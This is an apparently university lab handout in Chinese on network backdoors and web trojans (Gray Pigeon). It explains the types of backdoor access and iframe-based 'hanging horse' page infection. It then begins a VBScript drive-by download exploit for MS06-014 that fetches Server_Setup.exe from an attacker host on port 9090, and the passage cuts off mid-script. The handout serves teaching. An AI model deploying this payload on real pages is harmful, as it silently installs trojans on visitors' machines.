网络后门及网页木马.docVIP

实验三 网络后门和网页木马 【实验目的】 理解后门的定义与分类；掌握后门的操作与原理；剖析网页木马的工作原理； 理解木马的植入过程；学会编写简单的网页木马脚本；通过分析监控信息实现手动删除木马。 【实验人数】 每组2人 【系统环境】 Windows 【网络环境】 交换网络结构 【实验工具】 灰鸽子木马 【实验原理】 最早的后门是由系统开发人员为自己留下入口而安装的，而今天，并非开发人员将后门装入自己设计的程序中，而是大多数攻击者将后门装入他人开发和维护的系统中。通过使用这样的后门，攻击者可以很轻松地获得系统的访问权，进而获得系统的控制权。为了更加明确，我们给出后门的以下定义： 后门是一个允许攻击者绕过系统中常规安全控制机制的程序，它按照攻击者自己的意愿提供通道。 后门的作用在于为攻击者进入目标计算机提供通道。这个通道可能表现为不同形式，它取决于攻击者的目的和所使用的特定后门类型。后门能够为攻击者提供许多种不同类型的访问，包括以下几种： 本地权限的提升：这类后门使得对系统有访问权的攻击者突然变换其权限等级成为管理员，有了这些超级用户权限，攻击者可以重新设置系统或访问任何存储在系统中的文件。 单个命令的远程执行：利用这种类型的后门，攻击者可以向目标计算机发送消息。每次执行一个单独的命令，后门执行攻击者的命令并将其输出返回给攻击者。 远程命令行解释器访问：正如我们所知的远程shell命令，这种类型的后门允许攻击者通过网络快递直接地键入受害计算机的命令提示。攻击者可以利用命令行解释器的所有特征，包括执行一个命令集合的能力编写脚本，选择一些文件进行操作。远程shell比简单的单命令远程执行要强大得多，因为它们可以模拟攻击者对目标计算机的键盘有直接访问权的情形。 远程控制GUI（Remote Control of the GUI）：比将命令行解释器弄混乱更甚，有些后门可以让攻击者看到目标计算机的GUI，控制鼠标的移动，输入对键盘的操作，这些都是通过网络实现的。有了对GUI的远程控制，攻击者可以看到受害者对计算机的所有操作，甚至远程控制GUI。 无论后门提供何种类型的访问，我们都会发现这些方法的重点在于控制。后门使得攻击者控制计算机，这一切通常是通过网络远程实现的。有了装入目标计算机的后门，攻击者可以利用这种控制搜索计算机中的易感染文件，改变存储在系统中的任何数据，改装计算机，甚至使系统瘫痪。利用后门，攻击者可以像受害者计算机本身的管理员一样对其进行同样的控制。更有甚者，攻击者可以通过Internet在世界的任何地方实现该控制。 网页木马就是一个由黑客精心制作的含有木马的HTML网页，因为MS06014漏洞存在，当用户浏览这个网页时就被在后台自动安装了木马的安装程序。所以黑客会千方百计的诱惑或者欺骗人们去打开他所制作的网页，进而达到植入木马的目的。不过随着人们网络安全意识的提高，这种方法已经很难欺骗大家了。 还有一种方法就是通过iframe标签，在一个正常网站的主页上链接网页木马。浏览者在浏览正常的网站主页时，iframe语句就会链接到含有木马的网页，网页木马就被悄悄植入了。这种方法就是大家经常说的“挂马”，而中了木马的主机通常被幽默的称作“肉鸡”。“挂马”因为需要获取网站管理员的权限，所以难度很大。不过他的危害也是十分巨大的，如果黑客获得了一个每天流量上万的知名网站的管理员权限并成功“挂马”，那试想他会有多少“肉鸡”。以下是挂马操作。 htmlscript language=VBScript !-- 首先动态创建对象组件，并声明组件的clsid -- Set df = document.createElement(object) df.setAttribute classid, clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 !-- 创建XMLHTTP对象，用来完成从数据包到Request对象的转换以及发送任务 -- Set xh = df.createObject(Microsoft.XMLHTTP,) !-- 创建Adodb.Stream对象，提供存取二进制数据或文本流，实现对流的读、写等操作 -- Set ados = df.createObject(Adodb.Stream,) ados.type = 1 !-- 使用HTTP GET初始化HTTP请求 -- url = http://主机IP地址:9090/Server_Setup.exe xh.Open GET, url, False !-- 发送HTTP请求，并获取HTTP响应 -- xh.Send !-- 创建Scripting.FileSystem对象，提供对计算机文件系统进行访问